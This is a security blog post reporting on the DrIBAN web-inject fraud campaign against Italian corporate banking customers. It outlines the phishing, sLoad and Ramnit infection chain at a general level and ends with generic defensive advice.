Italian Corporate Banks Under Attack from Financial Fraud Campaign

Home > blog > Italian Corporate Banks Under Attack from Financial Fraud Campaign


Since at least 2019, Italian corporate banking customers have been targeted by a new financial fraud campaign that uses a web-inject toolkit called DrIBAN. The toolkit is capable of altering beneficiary account details during financial transactions, allowing fraudsters to transfer funds to illegitimate bank accounts. The campaign has been identified by Cleafy researchers who have reported that the fraudsters have gradually enhanced their tactics over the course of four years.

Initially, the campaign started targeting Italian corporate banks in 2019 and stopped in 2020. However, in 2021, a new campaign was observed hitting thousands of victims and is believed to be ongoing to date. The attackers have used better social engineering tactics to maintain a foothold in the targeted network for a longer duration while avoiding detection. They also use the Automated Transfer System (ATS) technique to bypass anti-fraud security systems used by banks, such as multi-factor authentication (MFA) and strong customer authentication (SCA).

The DrIBAN fraud operations target Windows workstations in the banks, attempting to replace legitimate bank details with those of accounts controlled by the attackers or their affiliates. To begin the attack, the fraudsters send a certified email or PEC (a special type of email used in Italy as a legal equivalent of registered mail) to potential victims, attempting to fool them into opening an attachment. These phishing emails carry an executable file designed to download sLoad, a PowerShell-based reconnaissance tool, onto the infected computer.

Once sLoad is downloaded, it collects system information and exfiltrates it for further analysis of the infected machine. It leverages Living-off-the-land (LotL) techniques that abuse genuine tools such as BITSAdmin and PowerShell. If the target is found profitable, the Ramnit banking trojan is dropped as the next stage payload.

The Ramnit banking trojan is one of the most advanced and notorious banking trojans in the world. It has been active since 2010 and has evolved over the years to become one of the most effective banking trojans. It is capable of stealing sensitive information such as login credentials, banking information, and personal information. Once the information is collected, it is sent to a command-and-control server controlled by the attackers.

The attackers use the stolen information to conduct fraudulent transactions, transfer funds to illegitimate accounts, and initiate other malicious activities. The attacks are highly sophisticated and difficult to detect, making them a significant threat to Italian corporate banks and their customers.

To protect themselves, Italian corporate banks and their customers should remain vigilant against phishing emails and other social engineering tactics. They should also implement strong cybersecurity measures such as multi-factor authentication, encryption, and network segmentation to prevent unauthorized access to sensitive information.

In addition, Italian corporate banks should invest in advanced threat detection and response solutions that use artificial intelligence and machine learning to detect and respond to threats in real-time. These solutions can help banks quickly identify and neutralize threats before they cause significant damage.

In conclusion, the financial fraud campaign targeting Italian corporate banking customers using the DrIBAN web-inject toolkit and the Ramnit banking trojan is a significant threat that requires immediate attention. Italian corporate banks and their customers must take proactive measures to protect themselves against these attacks and prevent fraudsters from stealing their sensitive information and funds. By implementing strong cybersecurity measures and investing in advanced threat detection and response solutions, they can effectively combat this threat and safeguard their financial systems and assets.

To concern more about devOps,identity security, Identity Access Management for enterprises please click on link below

click here

Reference Link